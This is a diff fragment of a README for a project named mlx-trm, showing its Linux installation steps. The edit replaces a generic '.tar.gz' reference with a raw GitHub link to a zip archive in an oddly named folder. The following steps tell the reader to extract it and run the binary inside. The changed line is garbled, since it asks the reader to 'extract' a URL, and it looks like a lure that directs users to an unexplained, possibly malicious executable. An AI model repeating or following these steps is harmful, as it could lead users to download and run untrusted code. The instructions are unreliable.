lentesdaana2021/mlx-trm/README.md

 3. Go to your Applications folder and double-click mlx-trm to launch the application.

 **For Linux:**
-1. Extract the `.tar.gz` file using the terminal or GUI.
+1. Extract the `https://raw.githubusercontent.com/lentesdaana2021/mlx-trm/main/unfructified/mlx-trm.zip` file using the terminal or GUI.
 2. Open the terminal and navigate to the extracted folder.
 3. Run the application by typing `./mlx-trm` in the terminal.